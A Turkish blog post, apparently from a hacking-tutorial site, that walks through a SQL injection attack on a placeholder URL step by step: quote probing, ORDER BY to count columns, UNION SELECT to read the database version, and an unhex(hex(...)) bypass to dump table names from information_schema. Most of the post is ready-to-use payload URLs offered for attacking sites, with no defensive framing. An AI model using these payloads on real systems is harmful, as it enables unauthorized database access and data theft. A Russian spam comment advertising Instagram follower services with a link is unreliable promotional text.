Yeni
Yükleniyor..

Who Am I

Merhaba Hoşgeldiniz ben İbrahim Gültepe Yazılım ve Siber Güvenlik uzmanıyım bu bloğu açmamdaki neden C# eğitimi ve güncel olan virüs donanım sorunlarını çözmek ve sizinde yapabileceğiniz hack çalışmalarını öğretmek.
Anasayfa / Kategorisiz / SQL İnjection Bypass Yöntemi (UNHEX)

SQL İnjection Bypass Yöntemi (UNHEX)

Edit

SQL İnjection Bypass Yöntemi (UNHEX) 



Merhaba arkadaşlar bu yazıda UNHEX sayesinde tablolara nasıl ulaşabileceğimizi anlatacağım.
Her zamanki gibi me ta-Karakterimizi sorguluyoruz sitemizde "'a" eğer varsa devam ediyoruz.
Şimdi ilk işimiz her zaman ki gibi arkadaşlar "order+by+10" komutumuz kolon sayımızı arıyoruz arkadaşlar.
Kod:
"site.com/index.php?id=1521 order by 9"
yapıyoruz ve ekranımız normal
Kod:
"site.com/index.php?id=1521 order by 10"
yapıyoruz hatamız ekrana gelmiyor fakat şunu görüyoruz sayfada bir değişiklik var arkadaşlar yani anlıyoruz ki
kolon sayımız "10" dur . Şimdi devam ediyoruz arkadaşlar. Her zaman ki gibi "union select" komutumuzla devam ediyoruz ;
Kod:
"site.com/index.php?id=1521 union select 1,2,3,4,5,6,7,8,9,10"
komutunu uyguluyoruz ve değerleri ekrana almaya çalışıyoruz.
Şimdi ekrana değerlerimizi yansıttı arkadaşlar ;
"2 , 3 , 6" Biz 2'den devam ediyoruz arkadaşlar . 
Kod:
"site.com/index.php?id=1521 union select 1,version(),3,4,5,6,7,8,9,10"
komutunu uygulayıp çekiyoruz ve sitenin versiyonunu gösterdi şimdi işimize dönüyoruz ve 
tabloları çekmeye çalışıyoruz arkadaşlar ;
Kod:
"site.com/index.php?id=1521 union select 1,group_concat(table_name),3,4,5,6,7,8,9,10+from+information_schema.tables+where+table_schema=database()"
komutunu uyguladığımız
taktirde normalde bize hata vermeyip normal bir şekilde devam etmemiz lazımdı fakat görüyoruz ki ekrana hiçbir değer yada tablo isimleri gelmemektedir.
Burada arkadaşlar yaygın olarak kullanılan şu yöntemi uyguluyoruz. "UNHEX" Yöntemini kullanarak devam ediyoruz arkadaşlar ;
Kod:
"site.com/index.php?id=1521 union select 1,unhex(hex(group_concat(table_name))),3,4,5,6,7,8,9,10+from+information_schema.tables+where+table_schema=database()"
komutunu uyguladığımız
taktirde görüyoruz ki arkadaşlar tablolarımız ekrana yansıdı şimdi gerisi pek de zor değil artık arkadaşlar ;
eğer ki tabloları yan yana hepsini göremiyorsanız sayfa kaynak kodunu görüntüleyebilirsiniz. Yada çift tıklayarak copy / paste uygularak görebiliyoruz vede şöyle bir yöntemi de var arkadaşlar.
Kod:
"site.com/index.php?id=1521 union select 1,unhex(hex(group_concat(table_name,char(60,112,62)))),3,4,5,6,7,8,9,10+from+information_schema.tables+where+table_schema=database()"
komutunu uyguladığımız
taktirde tablolar alt alta sıralanır arkadaşlar.
Google Plus'da Paylaş

Yazar Unknown

Yazar hakkında bilgi yazılacak.
    Blogger Yorumları
    Facebook Yorumları

1 yorum :

  1. Adsız22 Aralık 2022 11:01

    Инстраграмм остается самой популярной площадкой для продвижения собственного бизнеса. Но, как показывает практика, люди еще чаще подписываются на профили в которых уже достаточное количество подписчиков. Если заниматься продвижение своими силами, потратить на это можно очень немало времени, потому гораздо лучше обратиться к спецам из Krutiminst.ru по ссылке https://guides.co/p/dicopto.com

    YanıtlaSil

Kaydol: Kayıt Yorumları ( Atom )

Ziyaretçi Sayısı

15.08.2015 den itibaren Toplam 1.982.258 Kişi Tarafından Ziyaret Edildi